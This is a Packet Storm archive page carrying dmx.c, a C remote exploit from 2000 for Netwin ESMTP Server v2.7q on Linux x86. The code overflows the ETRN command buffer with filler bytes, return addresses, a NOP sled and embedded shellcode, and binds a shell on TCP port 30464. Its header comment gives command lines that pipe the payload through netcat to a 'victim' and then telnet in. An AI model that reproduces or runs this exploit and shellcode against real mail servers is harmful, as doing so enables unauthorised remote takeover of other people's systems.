what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

dmx.c

dmx.c
Posted Jun 6, 2000
Authored by Funkysh

Netwin ESMTP Server v2.7q linux x86 remote exploit. Tested on RedHat 6.1, binds a shell to TCP port 30464.

tags | exploit, remote, shell, x86, tcp
systems | linux, redhat
SHA-256 | f6229c6e2a67eb3307f3fb307b27985b9446209516295d99dc899bca3fe60903

dmx.c

Change Mirror Download
/*
* Netwin ESMTP Server v2.7q linux x86 remote exploit
* funkySh 05/06/2000 (Taeho Oh portbind shell)
* hello to b0f, #hax
*
* [ AAA ][ RET ][ NOP ][ SHELL ]
* $ (./dmx [offset] ; cat ) | nc victim 25
* $ telnet victim 30464
*
* (tested on RH6.1)
*/

#include <stdio.h>

char code[]=
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
"\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
"\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
"\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
"\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
"\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
"\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

#define BUFFER 1100
#define A_BUFF 250

#define RET_ADDR 0xbfffca74
#define ALIGN 0

char buf[BUFFER];

int main(int argc, char * argv[])
{
int i, offset = 0;
long address;
if(argc > 1) offset = atoi(argv[1]);
address = RET_ADDR + offset;
memset(buf,0x90,BUFFER);
memset(buf,0x41,A_BUFF);
for(i=240+ALIGN;i<350;i+=4)
*(int *)&buf[i]=address;

memcpy(buf+880,code,strlen(code));
fprintf(stderr,"Using: 0x%x\n", address);
printf("HELO dupa\n",0);
printf("ETRN %s\n", buf);
fprintf(stderr,"Now try to telnet victim:30464\n");
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close